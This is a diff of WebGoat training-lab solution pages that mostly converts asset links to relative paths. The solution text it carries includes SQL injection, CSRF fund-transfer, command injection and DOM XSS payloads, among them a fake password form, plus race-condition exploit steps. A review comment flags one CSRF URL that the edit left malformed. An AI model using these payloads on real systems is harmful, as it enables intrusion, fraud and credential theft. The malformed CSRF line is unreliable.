href="/WebGoat/lesson_solutions/BlindSqlInjection_files/colorschememapping.xml">
href="lesson_solutions/BlindSqlInjection_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -741,9 +741,9 @@ then answer is no.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_1419" o:spid="_x0000_i1030" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/BlindSqlInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image013.jpg" v:shapes="Picture_x0020_1419"><![endif]></span></p>
src="lesson_solutions/BlindSqlInjection_files/image013.jpg" v:shapes="Picture_x0020_1419"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -762,9 +762,9 @@ character is bigger then the value you get an invalid account error message.<o:p
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1420"
o:spid="_x0000_i1029" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/BlindSqlInjection_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image014.jpg" v:shapes="Picture_x0020_1420"><![endif]></span></p>
src="lesson_solutions/BlindSqlInjection_files/image014.jpg" v:shapes="Picture_x0020_1420"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -788,9 +788,9 @@ userid=15613) , 1 , 1) ) = 74 );<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1421"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/BlindSqlInjection_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image015.jpg" v:shapes="Picture_x0020_1421"><![endif]></span></p>
src="lesson_solutions/BlindSqlInjection_files/image015.jpg" v:shapes="Picture_x0020_1421"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -823,9 +823,9 @@ o, so you have now Jo.<o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1422" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/BlindSqlInjection_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image016.jpg" v:shapes="Picture_x0020_1422"><![endif]></span><span
src="lesson_solutions/BlindSqlInjection_files/image016.jpg" v:shapes="Picture_x0020_1422"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -857,9 +857,9 @@ that you found is Joesph. Enter this in the text field to complete this lesson.<
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1423"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/BlindSqlInjection_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image017.jpg" v:shapes="Picture_x0020_1423"><![endif]></span></p>
src="lesson_solutions/BlindSqlInjection_files/image017.jpg" v:shapes="Picture_x0020_1423"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -874,9 +874,9 @@ field-end'></span><![endif]--> Enter the name Joesph<span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1424"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/BlindSqlInjection_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image018.jpg" v:shapes="Picture_x0020_1424"><![endif]></span></p>
src="lesson_solutions/BlindSqlInjection_files/image018.jpg" v:shapes="Picture_x0020_1424"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/CSRF_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/CSRF_files/editdata.mso">
<link rel=File-List href="lesson_solutions/CSRF_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/CSRF_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/CSRF_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/CSRF_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/CSRF_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/CSRF_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -717,9 +717,9 @@ style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_105" o:spid="_x0000_i1029" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/CSRF_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/CSRF_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=370
src="/WebGoat/lesson_solutions/CSRF_files/image011.jpg" v:shapes="Picture_x0020_105"><![endif]></span></p>
src="lesson_solutions/CSRF_files/image011.jpg" v:shapes="Picture_x0020_105"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -758,7 +758,7 @@ mso-fareast-language:JA'>This payload will work:<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
mso-fareast-language:JA'>&lt;img
src="http://localhost/WebGoat/attack?Screen=81&amp;menu=210&amp;transferFunds=5000"
src="http://localhostattack?Screen=81&amp;menu=210&amp;transferFunds=5000"
width=&quot;1&quot; height=&quot;1&quot; /&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
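Review bot: The new payload line `src="http://localhostattack?Screen=81&amp;menu=210&amp;transferFunds=5000"` has lost the slash between the host and the path, so the documented CSRF example no longer forms a valid URL; stripping the hardcoded `/WebGoat` prefix took the separator with it. At minimum the line should read `src="http://localhost/attack?Screen=81&amp;menu=210&amp;transferFunds=5000"`, and since the whole point of this commit is that the context path is no longer fixed, the solution text would be clearer if it said the application's context path belongs between the host and `attack`. The other solution pages in this commit only switch asset links to relative `lesson_solutions/...` paths, which presumably resolve against the lesson page that embeds them; this hunk is the one where the edit changed the meaning of the instructions.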
@ -772,9 +772,9 @@ message with the payload.<o:p></o:p></span></p>
style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
id="Picture_x0020_106" o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;
height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/CSRF_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/CSRF_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=370
src="/WebGoat/lesson_solutions/CSRF_files/image012.jpg" v:shapes="Picture_x0020_106"><![endif]></span></p>
src="lesson_solutions/CSRF_files/image012.jpg" v:shapes="Picture_x0020_106"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -796,9 +796,9 @@ JA'><o:p>&nbsp;</o:p></span></p>
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_107"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/CSRF_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/CSRF_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=370
src="/WebGoat/lesson_solutions/CSRF_files/image013.jpg" v:shapes="Picture_x0020_107"><![endif]></span></p>
src="lesson_solutions/CSRF_files/image013.jpg" v:shapes="Picture_x0020_107"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -820,9 +820,9 @@ generated when the browers tries to render the image tag.<o:p></o:p></span></p>
style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
id="Picture_x0020_108" o:spid="_x0000_i1026" type="#_x0000_t75" style='width:481.5pt;
height:344.25pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/CSRF_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/CSRF_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=642 height=459
src="/WebGoat/lesson_solutions/CSRF_files/image014.jpg" v:shapes="Picture_x0020_108"><![endif]></span></p>
src="lesson_solutions/CSRF_files/image014.jpg" v:shapes="Picture_x0020_108"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span
@ -841,9 +841,9 @@ you need to refresh the page to get the green star next to the lesson.<o:p></o:p
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_109"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/CSRF_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/CSRF_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=370
src="/WebGoat/lesson_solutions/CSRF_files/image015.jpg" v:shapes="Picture_x0020_109"><![endif]></span></p>
src="lesson_solutions/CSRF_files/image015.jpg" v:shapes="Picture_x0020_109"><![endif]></span></p>
<p class=MsoCaption style='text-align:justify'>Figure <!--[if supportFields]><span
style='mso-element:field-begin'></span><span


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Client Side Filtering</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Client Side Filtering</p>
@ -36,7 +36,7 @@ can search for a specific person in Firebug. Make sure you find the hidden table
the information, including the salary and so on. In the same table you will find
Neville.
<img src="/WebGoat/lesson_solutions/ClientSideFiltering_files/clientside_firebug.jpg" alt="Clientside Filtering" /><br>
<img src="lesson_solutions/ClientSideFiltering_files/clientside_firebug.jpg" alt="Clientside Filtering" /><br>
<font size="2"><b>Inspect HTML on Firebug</b></font>
<p>


@ -4,7 +4,7 @@
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Insecure Client Storage</title>
<link rel="stylesheet" type="text/css"
href="/WebGoat/lesson_solutions/formate.css">
href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Insecure Client Storage</p>
@ -39,7 +39,7 @@ but stops at the breakpoint. On the right side you see the parameters
and there values. Now use the step over symbol or F10. Now you can read
the clear text of decrypted:
<br><br>
<img src="/WebGoat/lesson_solutions/ClientSideValidation_files/ClientSideValidation_stage1.png" width=450px alt="Stage 1" />
<img src="lesson_solutions/ClientSideValidation_files/ClientSideValidation_stage1.png" width=450px alt="Stage 1" />
<br>
<b><font size="2">Figure 1 Firebug in action</font></b>


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/CommandInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/CommandInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/CommandInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/CommandInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/CommandInjection_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/CommandInjection_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/CommandInjection_files/colorschememapping.xml">
href="lesson_solutions/CommandInjection_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -643,9 +643,9 @@ should be able to execute any command on the hosting OS.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_1375" o:spid="_x0000_i1028" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/CommandInjection_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/CommandInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/CommandInjection_files/image007.jpg" v:shapes="Picture_x0020_1375"><![endif]></span></p>
src="lesson_solutions/CommandInjection_files/image007.jpg" v:shapes="Picture_x0020_1375"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -670,9 +670,9 @@ lesson from the drop-down box and click on "View".<o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1376" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/CommandInjection_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/CommandInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/CommandInjection_files/image007.jpg" v:shapes="Picture_x0020_1376"><![endif]></span><span
src="lesson_solutions/CommandInjection_files/image007.jpg" v:shapes="Picture_x0020_1376"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -687,9 +687,9 @@ request with WebScarab when you click on "View". Append " &amp; netstat &minus;a
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1377"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/CommandInjection_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/CommandInjection_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=613 height=483
src="/WebGoat/lesson_solutions/CommandInjection_files/image008.jpg" v:shapes="Picture_x0020_1377"><![endif]></span></p>
src="lesson_solutions/CommandInjection_files/image008.jpg" v:shapes="Picture_x0020_1377"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -708,9 +708,9 @@ contains the output of the command netstat and ipconfig.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1378"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/CommandInjection_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/CommandInjection_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/CommandInjection_files/image009.jpg" v:shapes="Picture_x0020_1378"><![endif]></span></p>
src="lesson_solutions/CommandInjection_files/image009.jpg" v:shapes="Picture_x0020_1378"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Shopping Cart Concurrency Flaw</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Shopping Cart Concurrency Flaw</p>
@ -19,13 +19,13 @@ For this exercise, your mission is to exploit the concurrency issue which will a
<b>Solution:</b><br/><br/>
1. Open a new browser window on the same page.<br/><br/>
2. In window A you choose a low cost item and click "Purchase".<br/><br/>
<img src="/WebGoat/lesson_solutions/ConcurrencyCart_files/image001.jpg"><br/>
<img src="lesson_solutions/ConcurrencyCart_files/image001.jpg"><br/>
<font size="2"><b>Window A</b></font><br/><br/><br/>
3. In window B you choose the a high cost item you want to buy and click "update cart". The variable of the price has been overwritten now.<br/><br/>
<img src="/WebGoat/lesson_solutions/ConcurrencyCart_files/image002.jpg"><br/>
<img src="lesson_solutions/ConcurrencyCart_files/image002.jpg"><br/>
<font size="2"><b>Window B</b></font><br/><br/><br/>
4. In window A you can click click "Confirm" and you bought your item for a lower price.<br/><br/>
<img src="/WebGoat/lesson_solutions/ConcurrencyCart_files/image003.jpg"><br/>
<img src="lesson_solutions/ConcurrencyCart_files/image003.jpg"><br/>
<font size="2"><b>Window A Success</b></font><br/>
<br><br><br>
</body>


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/DOMInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/DOMInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/DOMInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/DOMInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/DOMInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/DOMInjection_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/DOMInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/DOMInjection_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -664,9 +664,9 @@ validation process works.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_49" o:spid="_x0000_i1030" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/DOMInjection_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/DOMInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/DOMInjection_files/image002.jpg" v:shapes="Picture_x0020_49"><![endif]></span></p>
src="lesson_solutions/DOMInjection_files/image002.jpg" v:shapes="Picture_x0020_49"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -695,7 +695,7 @@ validate() {<o:p></o:p></span></p>
= document.getElementById('key');<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>var url =
'/WebGoat/attack?Screen=80&amp;menu=1150&amp;from=ajax&amp;key=' +
'attack?Screen=80&amp;menu=1150&amp;from=ajax&amp;key=' +
encodeURIComponent(keyField.value);<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>if (typeof
@ -765,9 +765,9 @@ in WebScarab.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_50"
o:spid="_x0000_i1029" type="#_x0000_t75" style='width:481.5pt;height:345pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/DOMInjection_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/DOMInjection_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/DOMInjection_files/image004.jpg" v:shapes="Picture_x0020_50"><![endif]></span></p>
src="lesson_solutions/DOMInjection_files/image004.jpg" v:shapes="Picture_x0020_50"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -781,9 +781,9 @@ field-end'></span><![endif]--> HTTP Request</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_51" o:spid="_x0000_i1028"
type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/DOMInjection_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/DOMInjection_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/DOMInjection_files/image006.jpg" v:shapes="Picture_x0020_51"><![endif]></span></p>
src="lesson_solutions/DOMInjection_files/image006.jpg" v:shapes="Picture_x0020_51"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -802,9 +802,9 @@ reply and replace the body with document.forms[0].SUBMIT.disabled = false;<o:p><
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_52"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:481.5pt;height:345pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/DOMInjection_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/DOMInjection_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/DOMInjection_files/image008.jpg" v:shapes="Picture_x0020_52"><![endif]></span></p>
src="lesson_solutions/DOMInjection_files/image008.jpg" v:shapes="Picture_x0020_52"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -822,9 +822,9 @@ field-end'></span><![endif]--> Updated HTTP Response</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_53" o:spid="_x0000_i1026"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/DOMInjection_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/DOMInjection_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/DOMInjection_files/image010.jpg" v:shapes="Picture_x0020_53"><![endif]></span></p>
src="lesson_solutions/DOMInjection_files/image010.jpg" v:shapes="Picture_x0020_53"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -838,9 +838,9 @@ field-end'></span><![endif]--> Activate! Button is enabled</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_54" o:spid="_x0000_i1025"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/DOMInjection_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/DOMInjection_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/DOMInjection_files/image012.jpg" v:shapes="Picture_x0020_54"><![endif]></span></p>
src="lesson_solutions/DOMInjection_files/image012.jpg" v:shapes="Picture_x0020_54"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>DOM Based Cross Site Scripting (XSS)</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> DOM Based Cross Site Scripting (XSS)</p>
@ -18,16 +18,16 @@ For this exercise, your mission is to use this vulnerability to inject malicious
<b>Solution:</b><br/><br/>
Stage 1: Enter "&lt;IMG SRC="images/logos/owasp.jpg"/&gt;" and submit the solution.<br/><br/>
<img src="/WebGoat/lesson_solutions/DOMXSS_files/image001.jpg"><br/>
<img src="lesson_solutions/DOMXSS_files/image001.jpg"><br/>
<font size="2"><b>Stage 1 result</b></font><br/><br/><br/>
Stage 2: Enter "&lt;img src=x onerror=;;alert('XSS') /&gt;" and submit the solution.<br/><br/>
<img src="/WebGoat/lesson_solutions/DOMXSS_files/image002.jpg"><br/>
<img src="lesson_solutions/DOMXSS_files/image002.jpg"><br/>
<font size="2"><b>Stage 2 result</b></font><br/><br/><br/>
Stage 3: Enter "&lt;IFRAME SRC="javascript:alert('XSS');"&gt;&lt;/IFRAME&gt;" and submit the solution.<br/><br/>
<img src="/WebGoat/lesson_solutions/DOMXSS_files/image003.jpg"><br/>
<img src="lesson_solutions/DOMXSS_files/image003.jpg"><br/>
<font size="2"><b>Stage 3 result</b></font><br/><br/><br/>
Stage 4: Enter "Please enter your password:&lt;BR&gt;&lt;input type = "password" name="pass"/&gt;&lt;button onClick="javascript:alert('I have your password: ' + pass.value);"&gt;Submit&lt;/button&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt; &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;" and submit the solution.<br/><br/>
<img src="/WebGoat/lesson_solutions/DOMXSS_files/image004.jpg"><br/>
<img src="lesson_solutions/DOMXSS_files/image004.jpg"><br/>
<font size="2"><b>Stage 4 result</b></font><br/><br/><br/>
Stage 5: You have to use the JavaScript escape.js for the input.<br/>
You will find the JavaScripts in tomcat\webapps\WebGoat\javascript ( Standart Version ) or in WebContent\javascript ( Developer Version ).<br/>


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/DOS_Login_files/filelist.xml">
